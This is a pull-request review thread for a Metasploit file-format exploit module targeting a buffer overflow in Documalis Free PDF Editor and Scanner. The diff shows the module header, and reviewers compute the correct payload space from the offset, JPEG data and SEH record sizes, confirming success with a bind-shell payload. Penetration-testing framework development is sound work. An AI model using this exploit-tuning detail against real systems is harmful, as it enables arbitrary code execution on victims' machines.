modules/exploits/windows/fileformat/documalis_pdf_editor_and_scanner.rb

```diff
@@ -0,0 +1,120 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::FILEFORMAT
+  include Msf::Exploit::PDF
+  include Msf::Exploit::Seh
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'      => 'Documalis Free PDF ',
+      'Description' => %q{Documalis Free PDF Editor and Documalis Free PDF Scanner is prone to a security vulnerability when open PDF files.When the application is used to open a specially crafted PDF file, a buffer overflow occurs allowing arbitrary code execution.
+      },
+      'License'         => MSF_LICENSE,
+      'Author'          =>
+        [
+          'metacom', # Vulnerability discovery and PoC
+          '<metacom27[at]gmail.com>', # Metasploit module
+        ],
+      'References'      =>
+        [
+          ['EDB', ]
+        ],
+      'DefaultOptions'  =>
+        {
+          'EXITFUNC' => 'process', # none/process/thread/seh
+        },
+      'Platform'        => 'win',
+      'Payload'         =>
+        {
+          'Space' => 2000,
```

Comment:
Upon further review this is not right. The length of your offset generated by rand_text(target['Offset']) will generate 433 bytes of junk. If we add the length of the JPEG data itself, thats another 232 bytes, for a total of 665 bytes. Then one has to add on the SEH record generated by generate_seh_record, which is another 8 bytes long, for a total of 673 bytes.

If we then consider that the maximum size you can have for your buffer according to your exploit is 2388 bytes, this means that this value should really be 2388 - 673, or 1,715 bytes.

Reply:
Okay confirmed after changing this value to 1715 the exploit worked successfully with a `windows/shell/bind_tcp` payload.

Reply:
@metacom27 I went ahead and added in some commits that should fix this up.